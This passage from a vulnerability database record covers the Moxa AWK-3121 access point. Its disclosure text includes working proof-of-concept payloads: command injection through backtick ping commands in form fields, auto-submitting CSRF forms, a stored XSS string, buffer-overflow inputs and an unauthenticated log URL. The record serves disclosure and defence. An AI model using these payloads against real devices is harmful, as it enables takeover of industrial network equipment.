------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. The POST parameter \"iw_privatePass\"\n is susceptible to this injection. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. It\n provides functionality so that an administrator can change the\n name of the device. The POST parameter\n \"iw_board_deviceName\" is susceptible to this injection. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. The POST parameter \"iw_filename\" is susceptible to buffer\n overflow. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. The POST parameter \"iw_filename\" is susceptible to command\n injection via shell metacharacters. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. The POST parameter \"iw_serverip\" is susceptible to buffer\n overflow. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10692"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015587"
},
{
"db": "VULHUB",
"id": "VHN-120477"
},
{
"db": "VULMON",
"id": "CVE-2018-10692"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10692",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015587",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-320",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120477",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10692",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120477"
},
{
"db": "VULMON",
"id": "CVE-2018-10692"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015587"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10692"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-320"
}
]
},
"id": "VAR-201906-0782",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120477"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.647000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10692"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015587"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120477"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015587"
},
{
"db": "NVD",
"id": "CVE-2018-10692"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10692"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120477"
},
{
"db": "VULMON",
"id": "CVE-2018-10692"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015587"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10692"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-320"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120477"
},
{
"db": "VULMON",
"id": "CVE-2018-10692"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015587"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10692"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-320"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120477"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10692"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015587"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.340000",
"db": "NVD",
"id": "CVE-2018-10692"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-320"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-10T00:00:00",
"db": "VULHUB",
"id": "VHN-120477"
},
{
"date": "2019-06-10T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10692"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015587"
},
{
"date": "2019-06-10T23:29:01.777000",
"db": "NVD",
"id": "CVE-2018-10692"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-320"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-320"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Device cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015587"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-320"
}
],
"trust": 0.6
}
}
VAR-201906-0788
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user. Moxa AWK-3121 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. A trust management issue vulnerability exists in Moxa AWK-3121 version 1.14. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization.
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. However, the same functionality allows an attacker to execute commands on the device. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a web interface to allow an administrator to manage the device. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_privatePass" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection.
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to buffer overflow. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack.
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
